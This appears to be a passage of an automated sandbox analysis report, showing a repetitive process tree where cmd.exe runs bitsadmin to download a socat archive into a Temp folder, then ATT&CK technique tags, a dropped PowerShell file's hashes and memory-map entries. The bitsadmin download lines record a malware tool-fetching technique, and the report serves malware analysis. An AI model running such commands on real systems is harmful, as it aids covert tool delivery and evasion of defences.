                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            find /v ""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1572

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\a81Pa4oUST.ps1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5a845993db5372ebb697be1f145fd340

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          98e50f16fe1feae69ee0ded39faaafe1bd9341f5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          b5a29361d213c6667df1a9b67ba6c47591d73539a539e3bcb7b39ceccb54fe33

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          b84eecebccc46023e9fc8d8c3917c2953ae329e7bf366915343f41986106dd4285447e4954dac7c16486ba03021b7c4798efbc8fe3713651477e25badeeb2826

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/284-112-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/284-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/564-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/564-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/608-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/608-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/652-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/652-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/652-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-90-0x0000000073D70000-0x0000000073DF5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          532KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-94-0x0000000071030000-0x0000000071134000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-66-0x0000000073D70000-0x0000000073DF5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          532KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-67-0x00000000718F0000-0x000000007198C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          624KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-68-0x0000000071750000-0x00000000718EE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-69-0x0000000071680000-0x0000000071743000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          780KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-70-0x0000000074100000-0x000000007412D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-71-0x0000000071140000-0x0000000071676000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-72-0x0000000071030000-0x0000000071134000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-73-0x0000000070F10000-0x0000000071024000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-74-0x00000000708B0000-0x0000000070F01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-64-0x0000000074140000-0x0000000074375000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-76-0x0000000070720000-0x0000000070811000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          964KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-77-0x00000000737A0000-0x0000000073D4B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-78-0x0000000072CA0000-0x0000000073798000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          11.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-79-0x0000000071990000-0x000000007220A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-80-0x0000000072500000-0x0000000072C9C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-81-0x0000000074450000-0x00000000744D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          516KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-82-0x0000000074400000-0x000000007444B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-55-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-83-0x0000000074140000-0x0000000074375000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-85-0x00000000718F0000-0x000000007198C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          624KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-86-0x0000000071140000-0x0000000071676000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-127-0x0000000070720000-0x0000000070811000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          964KB

